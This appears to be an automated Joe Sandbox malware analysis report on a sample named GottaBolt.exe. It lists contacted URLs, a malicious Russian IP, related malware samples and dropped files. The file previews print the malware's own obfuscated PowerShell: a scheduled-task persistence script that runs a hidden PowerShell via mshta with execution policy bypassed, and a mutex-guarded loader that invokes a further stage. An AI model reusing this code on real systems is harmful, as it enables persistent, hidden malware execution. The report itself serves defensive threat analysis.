                                              http://crls.ssl.com/ssl.com-rsa-RootCA.crl0GottaBolt.exefalse
                                                high
                                                http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0GottaBolt.exefalse
                                                  high
                                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000004.00000002.2346622209.0000024E86928000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://contoso.com/powershell.exe, 00000008.00000002.4067770851.000001E8ED333000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.2368919507.0000024E96770000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.4067770851.000001E8ED1F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.4067770851.000001E8ED333000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://www.ssl.com/repository0GottaBolt.exefalse
                                                          high
                                                          http://dfssinstitute.comGottaBolt.exe, 00000000.00000002.2629516834.0000025280307000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://aka.ms/pscore68powershell.exe, 00000004.00000002.2346622209.0000024E86701000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3942045111.000001E8DD181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.3015755599.000001C1A9EE2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.3015755599.000001C1A9F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.3604226839.0000025F8668D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.3604226839.0000025F86677000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameGottaBolt.exe, 00000000.00000002.2629516834.0000025280299000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2346622209.0000024E86701000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3942045111.000001E8DD181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.3015755599.000001C1A9EE2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.3604226839.0000025F86677000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0GottaBolt.exefalse
                                                                high
                                                                https://dfssinstitute.comGottaBolt.exe, 00000000.00000002.2629516834.00000252802FE000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.2629516834.0000025280350000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.2629516834.00000252803CD000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.2629516834.000002528041E000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.2629516834.00000252803F6000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.2629516834.00000252802F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3942045111.000001E8DD3A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://ocsps.ssl.com0PGottaBolt.exefalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs
                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                77.91.73.101
                                                                dfssinstitute.comRussian Federation
                                                                42861FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRUtrue
                                                                172.86.76.228
                                                                unknownUnited States
                                                                9009M247GBfalse
                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1561030
                                                                Start date and time:2024-11-22 17:10:42 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 8m 35s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Run name:Run with higher sleep bypass
                                                                Number of analysed new started processes analysed:17
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:GottaBolt.exe
                                                                Detection:MAL
                                                                Classification:mal72.evad.winEXE@16/17@1/2
                                                                EGA Information:
                                                                • Successful, ratio: 66.7%
                                                                HCA Information:
                                                                • Successful, ratio: 91%
                                                                • Number of executed functions: 29
                                                                • Number of non-executed functions: 7
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe
                                                                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiApSrv.exe, svchost.exe
                                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                • Execution Graph export aborted for target powershell.exe, PID 5064 because it is empty
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                • Report size getting too big, too many NtEnumerateKey calls found.
                                                                • Report size getting too big, too many NtOpenKey calls found.
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                • VT rate limit hit for: GottaBolt.exe
                                                                No simulations
                                                                No context
                                                                No context
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRUT0jSGXdxX5.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                • 185.149.146.15
                                                                PC4rbXSgl4.exeGet hashmaliciousUnknownBrowse
                                                                • 77.91.77.187
                                                                file.exeGet hashmaliciousPhorpiexBrowse
                                                                • 77.91.77.92
                                                                i52xoegJro.exeGet hashmaliciousAmadeyBrowse
                                                                • 77.91.77.82
                                                                Jl5yg1Km2s.exeGet hashmaliciousAmadeyBrowse
                                                                • 77.91.77.82
                                                                file.exeGet hashmaliciousVidarBrowse
                                                                • 77.91.101.71
                                                                IRqsWvBBMc.exeGet hashmaliciousAmadey, VidarBrowse
                                                                • 77.91.101.71
                                                                file.exeGet hashmaliciousVidarBrowse
                                                                • 77.91.101.71
                                                                Bootstrapper.exeGet hashmaliciousHancitor, VidarBrowse
                                                                • 77.91.101.71
                                                                M247GBmpsl.elfGet hashmaliciousMirai, MoobotBrowse
                                                                • 38.205.138.228
                                                                sostener.vbsGet hashmaliciousRemcosBrowse
                                                                • 91.202.233.169
                                                                http://ok.clicknowvip.comGet hashmaliciousUnknownBrowse
                                                                • 38.132.109.126
                                                                owari.mips.elfGet hashmaliciousUnknownBrowse
                                                                • 38.202.251.241
                                                                ppc.elfGet hashmaliciousUnknownBrowse
                                                                • 213.182.204.57
                                                                hmips.elfGet hashmaliciousUnknownBrowse
                                                                • 213.182.204.57
                                                                file.exeGet hashmaliciousNetSupport RATBrowse
                                                                • 45.61.128.74
                                                                file.exeGet hashmaliciousNetSupport RATBrowse
                                                                • 45.61.128.74
                                                                yhYrGCKq9s.exeGet hashmaliciousRedLineBrowse
                                                                • 91.202.233.18
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                3b5074b1b5d032e5620f69f9f700ff0ehttps://insights.zohorecruit.com/ck1/2d6f.390d3f0/70932e40-a754-11ef-acd6-525400d4bb1c/c4b396bcef628ee60a3903dd64a571f46a43eb4a/2?e=AP6yJbny%2BojaTRJMo4YN29y4982EEh70QglqvV8aiCoCwftyNixblJXLnLCBIbU9pdrCb4rbSvPbWtRnPycgQw%3D%3DGet hashmaliciousUnknownBrowse
                                                                • 77.91.73.101
                                                                Payment CCF20240531_0002.htmlGet hashmaliciousUnknownBrowse
                                                                • 77.91.73.101
                                                                bootstraper.exeGet hashmaliciousUnknownBrowse
                                                                • 77.91.73.101
                                                                bootstraper.exeGet hashmaliciousUnknownBrowse
                                                                • 77.91.73.101
                                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                • 77.91.73.101
                                                                http://cdn.prod.website-files.com/65dccdc21b806b929439370e/66e00f5491860971b9b9ef25_80703488528.pdfGet hashmaliciousUnknownBrowse
                                                                • 77.91.73.101
                                                                2.ps1Get hashmaliciousUnknownBrowse
                                                                • 77.91.73.101
                                                                BX9IkWcF80.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                • 77.91.73.101
                                                                VKXD1NsFdC.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                • 77.91.73.101
                                                                No context
                                                                Process:C:\Users\user\Desktop\GottaBolt.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):1583
                                                                Entropy (8bit):5.362359765918443
                                                                Encrypted:false
                                                                SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6okHNpOtHTHhAHKKk9Hj:iq+wmj0qCYqGSI6oktpOtzHeqKk9D
                                                                MD5:C9D2B602C30A947D47A7AD769B3C8127
                                                                SHA1:D80EB805D03D1D001A988B565C3535C81596FE93
                                                                SHA-256:B404D07115AAAC07450587F37EE92C761E4DB6C07538C43081C1364460BA7FB5
                                                                SHA-512:F64E9D0C4F368C0894EA51D50C734E9C5418DDC69FD32F74CCDDFBBE1C4BD29E6B0C6C825E4A46FA7527F6A18DBA6AFB22CF094BE3A711AC16028801543301EC
                                                                Malicious:false
                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Syst
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):11608
                                                                Entropy (8bit):4.890472898059848
                                                                Encrypted:false
                                                                SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                                MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                                SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                                SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                                SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                                Malicious:false
                                                                Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):64
                                                                Entropy (8bit):0.34726597513537405
                                                                Encrypted:false
                                                                SSDEEP:3:Nlll:Nll
                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                Malicious:false
                                                                Preview:@...e...........................................................
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:PNG image data, 1473 x 1473, 8-bit/color RGBA, non-interlaced
                                                                Category:dropped
                                                                Size (bytes):7432853
                                                                Entropy (8bit):7.986271893099559
                                                                Encrypted:false
                                                                SSDEEP:196608:FPB+f1ue/rl7ZbXC/4e0nlW8uTZ6sGW6RAbF2AeWWCWyBaF:FZ+fl/FZA4e4lat6sj69OZBg
                                                                MD5:A2CBABC89FCAA0116EF6C3A81BBF6B2E
                                                                SHA1:91C56617B338A0489BCD5B2524D60A5C989D917E
                                                                SHA-256:799940F29519523970F6E6761D1AC892FEC5BA95DA764BF980ABF4F471DA0B35
                                                                SHA-512:1C3A71B5C37924926F250E871C2F41896D6212480B83C8BB6E5149A7638D3CB80918C84A292AFA84565588F7E2F8754F6623227C47F8E052971347BB36E11314
                                                                Malicious:false
                                                                Preview:.PNG........IHDR.............U-Wy....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..w8....UJB.J..%D.hh.....ESR........H*...%...>Z".E*.H..............z...8."..Z..T.......S.o....1....D.......P.....T.....,....~.8-..R...g.3.......8m.E..2.=..!+..'.@q.]F....o.....}.Eb.......<U.I.b.!...G.c.=........{9...!....i+.So.......4Y..g5..[3..4...P.....d.q(.g..W.@.T..w....*b>..."M..2..o.B.-w?..G.<S..a>x./.|.dm_.].....n..M.p...dz...>..[.X.......|w.v.{y.h...v.,9...%\.z.E9{..\...9..~._...5..T.{..6.4I..K.cr.(..T.s.E..,...b.z...X......w.i....,..|..v....3.>.4z3.A...c.#.._....9..Ws.R"Ck..~....Z..8....M...*.bR\..V._.......Mi..^....t..Z\(..o..t..&#...^)...eL.3....:c.6{%.w...w\...Ys....a:...Z..>.....\.....l...k.....H.g.~..'.`.v."Z..j.O\s......|v.Ju}9.......4a...h7...On.n.........X75...........^..EGa.-.]K+PLs!...Q.c..B./I.~..W.p.+.S4o....S1i.I.....=......v|.^!.v8.....5e..X......K.4.=.......db..6W..j.......@.....q ..?.{b%m5...e.g.]..fJ.l..:.0.D..{UtT.........K.$.
                                                                Process:C:\Users\user\Desktop\GottaBolt.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):793
                                                                Entropy (8bit):5.589103497959563
                                                                Encrypted:false
                                                                SSDEEP:12:UgANn9Ao9m9sg9m9JMGjjgAtvz9GN9J1/460vJ6k/TGNvQXxiG6Kuf3M8AV/j74W:un9N9mN9mRaN9FWJHKNv6ixffOuXM8HS
                                                                MD5:1E8B7467F841214CEDED274F62A443C8
                                                                SHA1:B912FEEA307FD22D8BA4A40A1164C97BEE46D613
                                                                SHA-256:FA9D8D0D8E0C948DC54266799EA39A7CD439E04560D9603B73B63F0247F35218
                                                                SHA-512:7EEA6F3FBF211B2003E323545AB5A343C6EEA9920151E070221BD089D4DE9889062654AB94835650E41DC42E7DF940D2935589116899B148B5FFB19B160727BA
                                                                Malicious:true
                                                                Preview:..$BQUvXUITGJDHWoPYyQBv = $MyInvocation.MyCommand.Name -replace ".ps1",""..$flbEvOoAQIIdwOkkZEkW = $PSCommandPath -replace "1.ps1","2.ps1" ..$flbEvOoAQIIdwOkkZEkW2 = $PSCommandPath -replace "1.ps1","1.txt"....try{.. $HIzWVshXpURAXEhWXAnM = Get-ScheduledTask | Where-Object {$_.TaskName -like $BQUvXUITGJDHWoPYyQBv }.. $goUUNIQyDIJciswPNyYw = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 1).. $XKJSyhkrRAEDWeSYCeRr = New-ScheduledTaskAction -Execute "mshta" -Argument "vbscript:Execute(""CreateObject(""""WScript.Shell"""").Run """"powershell -ep bypass -File """"""""$flbEvOoAQIIdwOkkZEkW """""""""""" ,0:close"")".... Register-ScheduledTask -TaskName $BQUvXUITGJDHWoPYyQBv -Trigger $goUUNIQyDIJciswPNyYw -Action $XKJSyhkrRAEDWeSYCeRr..}catch{}..
                                                                Process:C:\Users\user\Desktop\GottaBolt.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):634
                                                                Entropy (8bit):5.726161012326609
                                                                Encrypted:false
                                                                SSDEEP:12:Xsn97u8TLNTdLU6c/oLdHT0f+0Uc3Zq/n9Q4mXyB1CctTq9jXoYTc:8n9C8fNTJ3kWdWt3s/n9ZmXyB1lU9zFI
                                                                MD5:96031B520EDF57CE05932931DA90FBDE
                                                                SHA1:47F561244B8D98248BA5123CC37290BE790D1BE1
                                                                SHA-256:749807B925AA8DBFFD4CFA518AA728233CDAAB61B02786207DBBA71949FCB739
                                                                SHA-512:EE818345F62DF6F8CE320350DD62B34FB76D194931BD79D4A0F7A4D0EAFC7C336E8B0F3C3D9C68F63C2161CF52C19576EC9C39AC18222C0ACB71860A5740FD1C
                                                                Malicious:true
                                                                Preview:$twkjxBmygMkxawSaDigb = $MyInvocation.MyCommand.Name -replace ".ps1",""..$svhGAkxsbFdGultyPIvR = $false..$WOYsbyeSpDNVEUMUAuEh = New-Object Threading.EventWaitHandle $true, ([Threading.EventResetMode]::ManualReset), "Global\$twkjxBmygMkxawSaDigb", ([ref] $svhGAkxsbFdGultyPIvR)..if( -not $svhGAkxsbFdGultyPIvR ) {.. Exit..} else{..$YAgJNwmNoCtaMcTZktpt = $PSScriptRoot..$ELGqCfesmGFzJfgIouxx = $MyInvocation.MyCommand.Name -replace "2.ps1","3.ps1"..$FPRFaRlIijCdskOJgxsD = $YAgJNwmNoCtaMcTZktpt + "\"+$ELGqCfesmGFzJfgIouxx..$ilbkOBvdmRcUkcHHEprb = & $FPRFaRlIijCdskOJgxsD..$ilbkOBvdmRcUkcHHEprb.EntryPoint.Invoke($null, $null)..}
                                                                Process:C:\Users\user\Desktop\GottaBolt.exe
                                                                File Type:ASCII text, with CRLF, CR line terminators
                                                                Category:dropped
                                                                Size (bytes):4280
                                                                Entropy (8bit):5.847791443543489
                                                                Encrypted:false
                                                                SSDEEP:96:DQT+QxYEQ6QQQz+QsaZMWBYqFh7Mb5QmMtal:8iaYEBprbaZMRqFNMbKmMtal
                                                                MD5:88BFE5800FB382410458E02B60ECD216
                                                                SHA1:D39DD085A2A49EAD217F1013270B5E03646D3DE2
                                                                SHA-256:1E88DD46C36E20AEB6733DD031EAE8D522A8D23C509C438799A4AD697F8C17CE
                                                                SHA-512:3F3073ABED49EAC8CA13C6D3CFA6B1FF7D33D214F01DCE65E76D79DD9BE63B3A2A387D5953D480282E1F11CAA94679F4962D4FBC513B1137AC08A1C01CF074EF
                                                                Malicious:true
                                                                Yara Hits:
                                                                • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv3.ps1, Author: Joe Security
